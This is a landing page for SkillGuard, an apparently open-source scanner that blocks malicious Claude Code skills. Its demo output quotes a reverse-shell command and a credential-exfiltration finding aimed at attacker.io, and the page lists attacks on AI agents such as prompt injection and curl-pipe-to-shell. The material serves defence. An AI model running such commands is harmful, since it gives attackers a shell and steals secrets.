Scans every file in every skill
Four engines run in concert: a local zero-dependency pattern engine, plus Cisco, Snyk, and SkillAudit when you want them.
Nobody checks what's inside the skills Claude Code runs. SkillGuard does.
Open-source scanner that catches prompt injection, credential theft, and reverse shells in community skills — before Claude ever executes them. Local-only. No cloud upload.
Claude Code plugin · recommended
> /plugin marketplace add mannanj/skillguard
> /plugin install skillguard@skillguard✓ Verify: SkillGuard status line appears on your next skill use More install methods → View source
See it block
A malicious skill, refused at the gate
$ skillguard --skill pretty-formatter SkillGuard ⦿ scanning pretty-formatter ... ✗ BLOCKED reverse shell: bash -i >& /dev/tcp/45.x.x.x/4444 ✗ BLOCKED credential exfil: reads ANTHROPIC_API_KEY → POST attacker.io ✗ BLOCKED prompt injection in SKILL.md (zero-width chars) PreToolUse hook refused execution. 0 commands ran.
How it works
Three ideas, no magic
Blocks via PreToolUse hook
An unscanned skill never executes. The hook intercepts the invocation and refuses anything it hasn't cleared.
Rules you can read
No cloud upload, no opaque scores. Every detection is a pattern you can open, audit, and understand for yourself.
What it catches
The threats hiding in community skills
- Prompt injection in SKILL.md
- Credential & env-var exfiltration
- Reverse shells & hidden subprocesses
- Zero-width & base64 obfuscation
- Persistence & container escape
-
curl | shpipe execution
Get started
Install in two lines
Claude Code plugin · recommended
> /plugin marketplace add mannanj/skillguard
> /plugin install skillguard@skillguard✓ Verify: SkillGuard status line appears on your next skill use More install methods → View source